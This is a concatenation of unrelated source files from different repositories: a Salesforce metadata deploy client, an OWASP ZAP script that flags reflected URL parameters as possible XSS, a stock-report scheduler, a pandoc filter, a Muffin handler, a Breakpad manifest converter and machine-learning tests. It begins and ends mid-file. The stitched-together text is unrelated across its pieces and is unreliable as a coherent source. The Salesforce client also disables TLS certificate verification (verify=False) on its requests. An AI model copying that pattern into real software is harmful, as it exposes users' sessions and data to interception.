metadata_object = _type + "Folder" if _type != "EmailTemplate" else "EmailFolder"
# Waiting message in output console
Printer.get("log").write("[sf:retrieve] List Folders for %s" % metadata_object)
# Collect all folders into records
folders = []
elements = []
for record in self.list_package({metadata_object : [""]}):
elements.append({
"id": record["id"],
"fullName": record["fullName"],
"lastModifiedDate": record["lastModifiedDate"],
"lastModifiedById": record["lastModifiedById"],
"lastModifiedByName": record["lastModifiedByName"]
})
folders.append(record["fullName"])
for _folders in util.list_chunks(folders, 3):
Printer.get("log").write("[sf:retrieve] Fetching component metadata for %s Folder: %s" % (
_type, ", ".join(_folders)
))
# Add file in folders into retrieve list
for record in self.list_package({_type : _folders}):
detail = {
"id": record["id"],
"fullName": record["fullName"],
"lastModifiedDate": record["lastModifiedDate"],
"lastModifiedById": record["lastModifiedById"],
"lastModifiedByName": record["lastModifiedByName"]
}
elements.append(detail)
elements = sorted(elements, key=lambda k : k['fullName'])
_types[_type] = elements
# In order to speed up retrieve request, we will not list package for them
# just when we want to get full copy or build package.xml, we will list_package for all
# Note: CustomObject must be retrieved by ``list_package`` request
# list package for metadata object which supports wildcard retrieve
_types_list = []
# print("retrieve types: ", _types)
if not list_package_for_all:
if "CustomObject" in _types and "*" in _types["CustomObject"]:
_types_list.append("CustomObject")
if "InstalledPackage" in _types and "*" in _types["InstalledPackage"]:
_types_list.append("InstalledPackage")
else:
for _type in _types:
if "*" not in _types[_type]:
continue
if _type not in self.settings["metadata_objects_in_folder"]:
_types_list.append(_type)
# Sort _types_list
_types_list = sorted(_types_list)
# Maximum number of every list_package request is 3
# so we need to chunk list to little pieces
for _trunked_types_list in util.list_chunks(_types_list, 3):
_trunked_types = {}
for t in _trunked_types_list:
_trunked_types[t] = [""]
# Define type_with_elements for keeping files for _trunked_types
type_with_elements = {}
# list package for all non-folder metadata types
Printer.get("log").write("[sf:retrieve] Fetching component metadata for %s" % (
", ".join(_trunked_types)
))
for record in self.list_package(_trunked_types):
_type = record["type"]
# StandardValueSetTranslation doesn't have type?
if isinstance(record["type"], dict):
_type = "StandardValueSetTranslation"
detail = {
"id": record.get("id", ""),
"fullName": record["fullName"],
"lastModifiedDate": record["lastModifiedDate"],
"lastModifiedById": record["lastModifiedById"],
"lastModifiedByName": record["lastModifiedByName"]
}
if _type not in type_with_elements:
type_with_elements[_type] = [detail]
else:
type_with_elements[_type].append(detail)
# Order elements
for t in type_with_elements:
type_with_elements[t] = sorted(type_with_elements[t], key=lambda k : k['fullName'])
# Update _types with result of list_package request
for _type in _trunked_types:
if _type in type_with_elements:
_types[_type] = type_with_elements[_type]
else:
_types[_type] = []
# After reload is finished
if list_package_for_all:
Printer.get("log").write("Project cache is saved to local .config/package.json")
# Invoked by thread
self.result = {
"success": True,
"types": _types
}
# Invoked by retrieve request
return _types
def list_package(self, _types):
# Build soap_body
soap_body = self.soap.create_request('list_package', {"types": _types})
try:
response = requests.post(self.metadata_url, soap_body,
verify=False, headers=self.headers)
except requests.exceptions.RequestException as e:
Printer.get("log").write("Connection timeout when list package for %s" % (
", ".join(list(_types.keys()))
))
return []
# If status_code is > 399, which means it has error
if response.status_code > 399:
if "INVALID_SESSION_ID" in response.text:
Printer.get("log").write("Session is expired, need login again")
self.login(True)
return self.list_package(_types)
result = util.get_response_error(response)
Printer.get("log").write("Error happened when list package for %s, detail reason: %s" % (
", ".join(list(_types.keys())), result.get("Error Message", "Unknown Reason")
))
return []
result = xmltodict.parse(response.content)
result = result["soapenv:Envelope"]["soapenv:Body"]["listMetadataResponse"]
if not result or "result" not in result:
return []
result = result["result"]
if isinstance(result, dict):
result = [result]
self.result = result
return result
def check_deploy_status(self, async_process_id):
""" After async process is done, post a checkDeployResult to
get the deploy result
Arguments:
* async_process_id -- retrieve request asyncProcessId
"""
soap_body = self.soap.create_request('check_deploy_status', {
"async_process_id": async_process_id
})
response = requests.post(self.metadata_url, soap_body,
headers=self.headers, verify=False, timeout=120)
# If status_code is > 399, which means it has error
if response.status_code > 399:
self.result = util.get_response_error(response)
return self.result
result = xmltodict.parse(response.content)
try:
header = None
if "soapenv:Header" in result["soapenv:Envelope"]:
header = result["soapenv:Envelope"]["soapenv:Header"]["DebuggingInfo"]
result = result["soapenv:Envelope"]["soapenv:Body"]["checkDeployStatusResponse"]["result"]
result = {
"success": True,
"header": header,
"body": result
}
except KeyError as ke:
result = {
"Message": "Convert Xml to JSON Exception: " + str(ke),
"success": False
}
return result
def deploy(self, base64_zip, test_classes=[]):
""" Deploy zip file
Arguments:
* zipFile -- base64 encoded zipfile
"""
result = self.login()
if not result or not result["success"]: return
# Log the StartTime
start_time = datetime.datetime.now()
# Populate the soap_body with actual options
# move the deploy options in to class attributes from better manipulate
# deploy_options = self.settings["deploy_options"]
# If just checkOnly, output VALIDATE, otherwise, output DEPLOY
deploy_or_validate = "validate" if self.deploy_options["checkOnly"] else "deploy"
# [sf:deploy]
Printer.get('log').write_start().write("[sf:%s] Start request for a deploy..." % deploy_or_validate)
options = self.deploy_options
options["zipfile"] = base64_zip
# If testLevel is Run Specified Test,
# we need to specify the runTests
testLevel = options.get("testLevel", "NoTestRun")
if testLevel == "RunSpecifiedTests":
options["runTests"] = "\n".join([
"<met:runTests>%s</met:runTests>" % c for c in test_classes
])
soap_body = self.soap.create_request('deploy', options)
try:
response = requests.post(self.metadata_url, soap_body,
verify=False, headers=self.headers)
except requests.exceptions.RequestException as e:
self.result = {
"Error Message": "Network connection timeout when issuing deploy request",
"success": False
}
return self.result
# Check whether session_id is expired
if "INVALID_SESSION_ID" in response.text:
Printer.get('log').write("[sf:%s] Session expired, need login again" % deploy_or_validate)
result = self.login(True)
if not result["success"]:
self.result = result
return self.result
return self.deploy(base64_zip)
# If status_code is > 399, which means it has error
# If status_code is > 399, which means it has error
if response.status_code > 399:
self.result = util.get_response_error(response)
return self.result
# [sf:deploy]
Printer.get('log').write("[sf:%s] Request for a deploy submitted successfully." % deploy_or_validate)
# Get async process id
async_process_id = util.getUniqueElementValueFromXmlString(response.content, "id")
# [sf:deploy]
Printer.get('log').write("[sf:%s] Request ID for the current deploy task: %s" % (deploy_or_validate, async_process_id))
Printer.get('log').write("[sf:%s] Waiting for server to finish processing the request..." % deploy_or_validate)
# 2. issue a check status loop request to assure the async
# process is done
result = self.check_deploy_status(async_process_id)
body = result["body"]
index = 1
failure_dict = {}
while body["status"] in ["Pending", "InProgress", "Canceling"]:
if "stateDetail" in body:
if int(body["numberComponentsDeployed"]) < int(body["numberComponentsTotal"]):
Printer.get('log').write("[sf:%s] Request Status: %s (%s/%s) -- %s" % (
deploy_or_validate,
body["status"],
body["numberComponentsDeployed"],
body["numberComponentsTotal"],
body["stateDetail"]
))
else:
Printer.get('log').write("[sf:%s] TestRun Status: %s (%s/%s) -- %s" % (
deploy_or_validate,
body["status"],
body["numberTestsCompleted"],
body["numberTestsTotal"],
body["stateDetail"]
))
else:
Printer.get('log').write("[sf:%s] Request Status: %s" % (
deploy_or_validate, body["status"]
))
# Process Test Run Result
if "runTestResult" in body["details"] and \
"failures" in body["details"]["runTestResult"]:
failures = body["details"]["runTestResult"]["failures"]
if isinstance(failures, dict):
if failures["id"] not in failure_dict:
failure_dict[failures["id"]] = failures
Printer.get('log').write("-" * 84).write("Test Failures: ")
Printer.get('log').write("%s.\t%s" % (index, failures["message"]))
for msg in failures["stackTrace"].split("\n"):
Printer.get('log').write("\t%s" % msg)
# [sf:deploy]
Printer.get('log').write("-" * 84)
index += index
elif isinstance(failures, list):
for f in failures:
if f["id"] not in failure_dict:
failure_dict[f["id"]] = f
Printer.get('log').write("-" * 84).write("Test Failures: ")
Printer.get('log').write("%s.\t%s" % (index, f["message"]))
# If compile error, there will no stack trace
if isinstance(f["stackTrace"], str):
for msg in f["stackTrace"].split("\n"):
Printer.get('log').write("\t%s" % msg)
Printer.get('log').write("-" * 84)
index += 1
# Thread Wait
sleep_seconds = 2 if body["status"] == "Pending" else self.settings["metadata_polling_frequency"]
time.sleep(sleep_seconds)
result = self.check_deploy_status(async_process_id)
body = result["body"]
# Check if job is canceled
if body["status"] == "Canceled":
Printer.get('log').write("\nBUILD FAILED", False)
Printer.get('log').write("*********** DEPLOYMENT FAILED ***********", False)
Printer.get('log').write("Request ID: %s" % async_process_id, False)
Printer.get('log').write("\nRequest Canceled", False)
Printer.get('log').write("*********** DEPLOYMENT FAILED ***********", False)
# If check status request failed, this will not be done
elif body["status"] == "Failed":
# Append failure message
Printer.get('log').write("[sf:%s] Request Failed\n\nBUILD FAILED" % deploy_or_validate)
Printer.get('log').write("*********** DEPLOYMENT FAILED ***********", False)
Printer.get('log').write("Request ID: %s" % async_process_id, False)
# Output Failure Details
failures_messages = []
if "componentFailures" in body["details"]:
component_failures = body["details"]["componentFailures"]
if isinstance(component_failures, dict):
component_failures = [component_failures]
for index in range(len(component_failures)):
component_failure = component_failures[index]
failures_messages.append("%s. %s -- %s: %s (line %s column %s)" % (
index + 1,
component_failure["fileName"],
component_failure["problemType"],
component_failure["problem"],
component_failure["lineNumber"] \
if "lineNumber" in component_failure else "N/A",
component_failure["columnNumber"] \
if "columnNumber" in component_failure else "N/A"
))
elif "runTestResult" in body["details"]:
failures = body["details"]["runTestResult"].get("failures", [])
if isinstance(failures, dict):
failures = [failures]
for index in range(len(failures)):
failure = failures[index]
failures_messages.append("%s. %s -- %s: %s" % (
index + 1,
failure.get("type"),
failure.get("name"),
failure.get("message")
))
# Unknown exception printer
if "errorMessage" in body:
Printer.get('log').write("\n" + body["errorMessage"], False)
warning_messages = []
if "runTestResult" in body["details"]:
runTestResult = body["details"]["runTestResult"]
if "codeCoverageWarnings" in runTestResult:
coverage_warnings = runTestResult["codeCoverageWarnings"]
if isinstance(runTestResult["codeCoverageWarnings"], dict):
coverage_warnings = [coverage_warnings]
elif isinstance(runTestResult["codeCoverageWarnings"], list):
coverage_warnings = coverage_warnings
for warn in coverage_warnings:
if not isinstance(warn["name"], str): continue
warning_messages.append("%s -- %s" % (warn["name"], warn["message"]))
# Output failure message
if failures_messages:
Printer.get('log').write("\n\nAll Component Failures:", False)
Printer.get('log').write("\n"+"\n\n".join(failures_messages), False)
# Output warning message
if warning_messages:
Printer.get('log').write("\n\nTest Coverage Warnings:", False)
Printer.get('log').write("\n"+"\n".join(warning_messages), False)
# End for Deploy Result
Printer.get('log').write("\n*********** %s FAILED ***********" % (
deploy_or_validate.upper()), False)
else:
# Append succeed message
Printer.get('log').write("\n[sf:%s] Request Succeed" % deploy_or_validate, False)
Printer.get('log').write("[sf:%s] *********** %s SUCCEEDED ***********" % (
deploy_or_validate, deploy_or_validate.upper()), False)
Printer.get('log').write("[sf:%s] Finished request %s successfully." % (
deploy_or_validate, async_process_id), False)
# Total time
total_seconds = (datetime.datetime.now() - start_time).seconds
Printer.get('log').write("\n\nTotal time: %s seconds" % total_seconds, False)
# # Display debug log message in the new view
# view = sublime.active_window().new_file()
# view.run_command("new_view", {
# "name": "Debugging Information",
# "input": result.get("header", {}).get("debugLog", "")
# })
self.result = result |
passive/find_reflected_params.py | knassar702/community-scripts | 629 | 12685379 | <reponame>knassar702/community-scripts
"""
looks for parameter values that are reflected in the response.
Author: <EMAIL>
The scan function will be called for request/response made via ZAP, excluding some of the automated tools
Passive scan rules should not make any requests
Note that new passive scripts will initially be disabled
Right click the script in the Scripts tree and select "enable"
Refactored & Improved by nil0x42
"""
# Set to True if you want to see results on a per param basis
# (i.e.: A single URL may be listed more than once)
RESULT_PER_FINDING = False
# Ignore parameters whose length is too short
MIN_PARAM_VALUE_LENGTH = 8
def scan(ps, msg, src):
# Docs on alert raising function:
# raiseAlert(int risk, int confidence, str name, str description, str uri,
# str param, str attack, str otherInfo, str solution,
# str evidence, int cweId, int wascId, HttpMessage msg)
# risk: 0: info, 1: low, 2: medium, 3: high
# confidence: 0: falsePositive, 1: low, 2: medium, 3: high, 4: confirmed
alert_title = "Reflected HTTP GET parameter(s) (script)"
alert_desc = ("Reflected parameter value has been found. "
"A reflected parameter values may introduce XSS "
"vulnerability or HTTP header injection.")
uri = header = body = None
reflected_params = []
for param in msg.getUrlParams():
value = param.getValue()
if len(value) < MIN_PARAM_VALUE_LENGTH:
continue
if not header:
uri = msg.getRequestHeader().getURI().toString()
header = msg.getResponseHeader().toString()
body = msg.getResponseBody().toString()
if value in header or value in body:
if RESULT_PER_FINDING:
param_name = param.getName()
ps.raiseAlert(0, 2, alert_title, alert_desc, uri, param_name,
None, None, None, value, 0, 0, msg)
else:
reflected_params.append(param.getName())
if reflected_params and not RESULT_PER_FINDING:
reflected_params = u",".join(reflected_params)
ps.raiseAlert(0, 2, alert_title, alert_desc, uri, reflected_params,
None, None, None, None, 0, 0, msg)
|
examples/reports/report_stats.py | vishalbelsare/zvt | 2,032 | 12685385 | # -*- coding: utf-8 -*-
import logging
from apscheduler.schedulers.background import BackgroundScheduler
from examples.report_utils import report_top_stats
from zvt import init_log
logger = logging.getLogger(__name__)
sched = BackgroundScheduler()
@sched.scheduled_job("cron", hour=19, minute=30, day_of_week="mon-fri")
def report_stats():
report_top_stats(
entity_type="stock",
entity_provider="em",
data_provider="em",
periods=[7, 30, 180, 365],
ignore_new_stock=True,
adjust_type=None,
top_count=30,
turnover_threshold=100000000,
turnover_rate_threshold=0.02,
em_group_over_write=True,
)
report_top_stats(
entity_type="stockhk",
entity_provider="em",
data_provider="em",
top_count=30,
periods=[7, 30, 180, 365],
ignore_new_stock=True,
adjust_type=None,
turnover_threshold=100000000,
turnover_rate_threshold=0.005,
em_group_over_write=False,
)
if __name__ == "__main__":
init_log("report_stats.log")
report_stats()
sched.start()
sched._thread.join()
|
merlin/gaussian.py | goodmami/pywsd | 581 | 12685393 | #!/usr/bin/python -*- coding: utf-8 -*-
#
# Merlin - Almost Native Python Machine Learning Library: Gaussian Distribution
#
# Copyright (C) 2014-2015 alvations
# URL:
# For license information, see LICENSE.md
import numpy as np
"""
Class for univariate gaussian
p(x) = 1/sqrt(2*pi*simga^2) * e ^ - (x-miu)^2/2*sigma^2
Where miu is the gaussian mean, and sigma^2 is the gaussian variance
"""
class Gaussian:
def __init__(self,mean,variance):
self.mean = mean;
self.variance = variance;
def sample(self,points):
return np.random.normal(self.mean,self.variance,points)
def estimate_gaussian(X):
"""
Returns the mean and the variance of a data set of X points assuming that
the points come from a gaussian distribution X.
"""
mean = np.mean(X,0)
variance = np.var(X,0)
return Gaussian(mean,variance) |
distributed/http/__init__.py | bnavigator/distributed | 1,358 | 12685410 | <gh_stars>1000+
from .utils import get_handlers
|
bookwyrm/migrations/0149_merge_20220526_1716.py | mouse-reeve/fedireads | 270 | 12685428 | <gh_stars>100-1000
# Generated by Django 3.2.13 on 2022-05-26 17:16
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("bookwyrm", "0148_alter_user_preferred_language"),
("bookwyrm", "0148_merge_20220326_2006"),
]
operations = []
|
research/domain_adaptation/domain_separation/grl_ops_test.py | 873040/Abhishek | 3,326 | 12685444 | # Copyright 2016 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for grl_ops."""
#from models.domain_adaptation.domain_separation import grl_op_grads # pylint: disable=unused-import
#from models.domain_adaptation.domain_separation import grl_op_shapes # pylint: disable=unused-import
import tensorflow as tf
import grl_op_grads
import grl_ops
FLAGS = tf.app.flags.FLAGS
class GRLOpsTest(tf.test.TestCase):
def testGradientReversalOp(self):
with tf.Graph().as_default():
with self.test_session():
# Test that in forward prop, gradient reversal op acts as the
# identity operation.
examples = tf.constant([5.0, 4.0, 3.0, 2.0, 1.0])
output = grl_ops.gradient_reversal(examples)
expected_output = examples
self.assertAllEqual(output.eval(), expected_output.eval())
# Test that shape inference works as expected.
self.assertAllEqual(output.get_shape(), expected_output.get_shape())
# Test that in backward prop, gradient reversal op multiplies
# gradients by -1.
examples = tf.constant([[1.0]])
w = tf.get_variable(name='w', shape=[1, 1])
b = tf.get_variable(name='b', shape=[1])
init_op = tf.global_variables_initializer()
init_op.run()
features = tf.nn.xw_plus_b(examples, w, b)
# Construct two outputs: features layer passes directly to output1, but
# features layer passes through a gradient reversal layer before
# reaching output2.
output1 = features
output2 = grl_ops.gradient_reversal(features)
gold = tf.constant([1.0])
loss1 = gold - output1
loss2 = gold - output2
opt = tf.train.GradientDescentOptimizer(learning_rate=0.01)
grads_and_vars_1 = opt.compute_gradients(loss1,
tf.trainable_variables())
grads_and_vars_2 = opt.compute_gradients(loss2,
tf.trainable_variables())
self.assertAllEqual(len(grads_and_vars_1), len(grads_and_vars_2))
for i in range(len(grads_and_vars_1)):
g1 = grads_and_vars_1[i][0]
g2 = grads_and_vars_2[i][0]
# Verify that gradients of loss1 are the negative of gradients of
# loss2.
self.assertAllEqual(tf.negative(g1).eval(), g2.eval())
if __name__ == '__main__':
tf.test.main()
|
filters/numenvs.py | adamgayoso/scvi-tools-handbook | 150 | 12685451 | <reponame>adamgayoso/scvi-tools-handbook<filename>filters/numenvs.py
#!/usr/bin/env python3
"""
Simple pandoc filter to create flexible environments in markdown. Style of
environments controlled via latex environment definitions or css for html.
Numbered theorem environment example:
begin-Theorem
$2+2=4$
end-Theorem
Unnumered environment:
begin+Example
This.
end+Example
The `begin` and `end` statements must be at the beginning of new paragraph.
"""
from pandocfilters import toJSONFilter, RawBlock
env_counts = {}
def html(string):
"""Return html block from string."""
return RawBlock('html', string)
def latex(string):
"""Return latex block from string."""
return RawBlock('latex', string)
def parse_env_latex(key, value):
"""Parse paragraph opening to extract environment name."""
if key == 'Para':
if len(value) >= 1:
content = value[0]['c']
if content[:6] == 'begin+' or content[:6] == 'begin-':
return 'begin', content[6:]
if content[:4] == 'end-' or content[:4] == 'end+':
return 'end', content[4:]
return '', ''
def parse_env_html(key, value):
"""Parse paragraph opening to extract environment name."""
if key == 'Para':
if len(value) >= 1:
content = value[0]['c']
if content[:6] == 'begin-':
global env_counts
name = content[6:]
if name in env_counts:
env_counts[name] += 1
else:
env_counts[name] = 1
return 'begin', name, env_counts[name]
if content[:6] == 'begin+':
name = content[6:]
return 'begin', name, None
if content[:4] == 'end-' or content[:4] == 'end+':
return 'end', content[4:], None
return '', '', None
def num_envs_latex(key, value):
"""Create numbered divs environments."""
instr, label = parse_env_latex(key, value)
if instr == 'begin':
return latex('\\begin{%s}\n' % label)
if instr == 'end':
return latex('\\end{%s}\n' % label)
def num_envs_html(key, value):
"""Create numbered divs environments."""
instr, label, num = parse_env_html(key, value)
if instr == 'begin':
if num:
title = label + ' ' + str(num)
else:
title = label
return [html('<div class="numenv %s">' % label),
html('<span class="numenv %s title">%s.</span>' % (label, title))]
if instr == 'end':
return html('</div>')
#pylint: disable=unused-argument
def num_envs(key, value, fmt, meta):
"""Select action based on format."""
if fmt == 'html5':
return num_envs_html(key, value)
if fmt == 'latex':
return num_envs_latex(key, value)
return None
if __name__ == "__main__":
toJSONFilter(num_envs)
|
muffin/handler.py | klen/muffin | 704 | 12685470 | <reponame>klen/muffin
"""Muffin Handlers."""
import inspect
import typing as t
from http_router import Router
from http_router.typing import TYPE_METHODS
from asgi_tools import Request
from asgi_tools.app import HTTPView, HTTP_METHODS
from asgi_tools.utils import is_awaitable
class HandlerMeta(type):
"""Prepare handlers."""
def __new__(mcs, name, bases, params):
"""Prepare a Handler Class."""
cls = super().__new__(mcs, name, bases, params)
# Ensure that the class methods are exist and iterable
if not cls.methods:
cls.methods = set(method for method in HTTP_METHODS if method.lower() in cls.__dict__)
elif isinstance(cls.methods, str):
cls.methods = [cls.methods]
cls.methods = set(method.upper() for method in cls.methods)
for m in cls.methods:
method = getattr(cls, m.lower(), None)
if method and not is_awaitable(method):
raise TypeError(f"The method '{method.__qualname__}' has to be awaitable")
return cls
def route_method(*paths: str, **params) -> t.Callable:
"""Mark a method as a route."""
def wrapper(method):
"""Wrap a method."""
method.__route__ = paths, params
return method
return wrapper
class Handler(HTTPView, metaclass=HandlerMeta):
"""Class-based view pattern for handling HTTP method dispatching.
.. code-block:: python
@app.route('/hello', '/hello/{name}')
class HelloHandler(Handler):
async def get(self, request):
name = request.patch_params.get('name') or 'all'
return "GET: Hello f{name}"
async def post(self, request):
name = request.patch_params.get('name') or 'all'
return "POST: Hello f{name}"
@Handler.route('/hello/custom')
async def custom(self, request):
return 'Custom HELLO'
# ...
async def test_my_endpoint(client):
response = await client.get('/hello')
assert await response.text() == 'GET: Hello all'
response = await client.get('/hello/john')
assert await response.text() == 'GET: Hello john'
response = await client.post('/hello')
assert await response.text() == 'POST: Hello all'
response = await client.get('/hello/custom')
assert await response.text() == 'Custom HELLO'
response = await client.delete('/hello')
assert response.status_code == 405
"""
methods: t.Optional[t.Sequence[str]] = None
@classmethod
def __route__(cls, router: Router, *paths: str, methods: TYPE_METHODS = None, **params):
"""Check for registered methods."""
router.bind(cls, *paths, methods=methods or cls.methods, **params)
for _, method in inspect.getmembers(cls, lambda m: hasattr(m, '__route__')):
cpaths, cparams = method.__route__
router.bind(cls, *cpaths, __meth__=method.__name__, **cparams)
return cls
def __call__(self, request: Request, *args, **opts) -> t.Awaitable:
"""Dispatch the given request by HTTP method."""
method = getattr(self, opts.get('__meth__') or request.method.lower())
return method(request)
route = route_method
|
src/tools/python/deps-to-manifest.py | michel-slm/breakpad | 2,151 | 12685496 | #!/usr/bin/python
# Copyright 2016 Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Convert gclient's DEPS file to repo's manifest xml file."""
from __future__ import print_function
import argparse
import os
import sys
REMOTES = {
'chromium': 'https://chromium.googlesource.com/',
'github': 'https://github.com/',
}
REVIEWS = {
'chromium': 'https://chromium-review.googlesource.com',
}
MANIFEST_HEAD = """<?xml version='1.0' encoding='UTF-8'?>
<!-- AUTOGENERATED BY %(prog)s; DO NOT EDIT -->
<manifest>
<default revision='refs/heads/master'
remote='chromium'
sync-c='true'
sync-j='8' />
"""
MANIFEST_REMOTE = """
<remote name='%(name)s'
fetch='%(fetch)s'
review='%(review)s' />
"""
MANIFEST_PROJECT = """
<project path='%(path)s'
name='%(name)s'
revision='%(revision)s'
remote='%(remote)s' />
"""
MANIFEST_TAIL = """
</manifest>
"""
def ConvertDepsToManifest(deps, manifest):
"""Convert the |deps| file to the |manifest|."""
# Load the DEPS file data.
ctx = {}
execfile(deps, ctx)
new_contents = ''
# Write out the common header.
data = {
'prog': os.path.basename(__file__),
}
new_contents += MANIFEST_HEAD % data
# Write out the <remote> sections.
for name, fetch in REMOTES.items():
data = {
'name': name,
'fetch': fetch,
'review': REVIEWS.get(name, ''),
}
new_contents += MANIFEST_REMOTE % data
# Write out the main repo itself.
data = {
'path': 'src',
'name': 'breakpad/breakpad',
'revision': 'refs/heads/master',
'remote': 'chromium',
}
new_contents += MANIFEST_PROJECT % data
# Write out the <project> sections.
for path, url in ctx['deps'].items():
for name, fetch in REMOTES.items():
if url.startswith(fetch):
remote = name
break
else:
raise ValueError('Unknown DEPS remote: %s: %s' % (path, url))
# The DEPS url will look like:
# https://chromium.googlesource.com/external/gyp/@e8ab0833a42691cd2
remote_path, rev = url.split('@')
remote_path = remote_path[len(fetch):]
# If it's not a revision, assume it's a tag. Repo wants full ref names.
if len(rev) != 40:
rev = 'refs/tags/%s' % rev
data = {
'path': path,
'name': remote_path,
'revision': rev,
'remote': remote,
}
new_contents += MANIFEST_PROJECT % data
# Write out the common footer.
new_contents += MANIFEST_TAIL
# See if the manifest has actually changed contents to avoid thrashing.
try:
old_contents = open(manifest).read()
except IOError:
# In case the file doesn't exist yet.
old_contents = ''
if old_contents != new_contents:
print('Updating %s due to changed %s' % (manifest, deps))
with open(manifest, 'w') as fp:
fp.write(new_contents)
def GetParser():
"""Return a CLI parser."""
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('deps',
help='The DEPS file to convert')
parser.add_argument('manifest',
help='The manifest xml to generate')
return parser
def main(argv):
"""The main func!"""
parser = GetParser()
opts = parser.parse_args(argv)
ConvertDepsToManifest(opts.deps, opts.manifest)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
TrainingExtensions/torch/test/python/test_comp_ratio_select.py | quic-tsinghal/aimet | 945 | 12685541 | # /usr/bin/env python3.5
# -*- mode: python -*-
# =============================================================================
# @@-COPYRIGHT-START-@@
#
# Copyright (c) 2017-2018, Qualcomm Innovation Center, Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# SPDX-License-Identifier: BSD-3-Clause
#
# @@-COPYRIGHT-END-@@
# =============================================================================
import unittest
import unittest.mock
from unittest.mock import create_autospec
from decimal import Decimal
import math
import os
import signal
from torch import nn
import torch.nn.functional as functional
import libpymo as pymo
from aimet_common.defs import CostMetric, LayerCompRatioPair
from aimet_common.cost_calculator import SpatialSvdCostCalculator,WeightSvdCostCalculator
from aimet_common import comp_ratio_select
from aimet_common.bokeh_plots import BokehServerSession
from aimet_common.bokeh_plots import DataTable
from aimet_common.bokeh_plots import ProgressBar
from aimet_common.utils import start_bokeh_server_session
from aimet_torch.utils import create_rand_tensors_given_shapes
from aimet_torch.examples import mnist_torch_model
from aimet_torch.layer_database import Layer, LayerDatabase
from aimet_torch.svd.svd_pruner import SpatialSvdPruner
from aimet_torch import pymo_utils
class MnistModel(nn.Module):
def __init__(self):
super(MnistModel, self).__init__()
self.conv1 = nn.Conv2d(1, 32, kernel_size=5, padding=(2, 2))
self.conv2 = nn.Conv2d(32, 64, kernel_size=5, padding=(2, 2))
self.conv2_drop = nn.Dropout2d()
self.fc1 = nn.Linear(7*7*64, 1024)
self.fc2 = nn.Linear(1024, 10)
def forward(self, x):
x = functional.relu(functional.max_pool2d(self.conv1(x), 2))
x = functional.relu(functional.max_pool2d(self.conv2_drop(self.conv2(x)), 2))
x = x.view(-1, x.size(1) * x.size(2) * x.size(3))
x = functional.relu(self.fc1(x))
x = functional.dropout(x, training=self.training)
x = self.fc2(x)
return functional.log_softmax(x, dim=1)
class TestTrainingExtensionsCompRatioSelect(unittest.TestCase):
def test_per_layer_eval_scores(self):
url, process = start_bokeh_server_session(8006)
bokeh_session = BokehServerSession(url=url, session_id="compression")
pruner = unittest.mock.MagicMock()
eval_func = unittest.mock.MagicMock()
model = mnist_torch_model.Net().to('cpu')
input_shape = (1, 1, 28, 28)
dummy_input = create_rand_tensors_given_shapes(input_shape)
layer_db = LayerDatabase(model, dummy_input)
layer1 = layer_db.find_layer_by_name('conv1')
layer_db.mark_picked_layers([layer1])
eval_func.side_effect = [90, 80, 70, 60, 50, 40, 30, 20, 10]
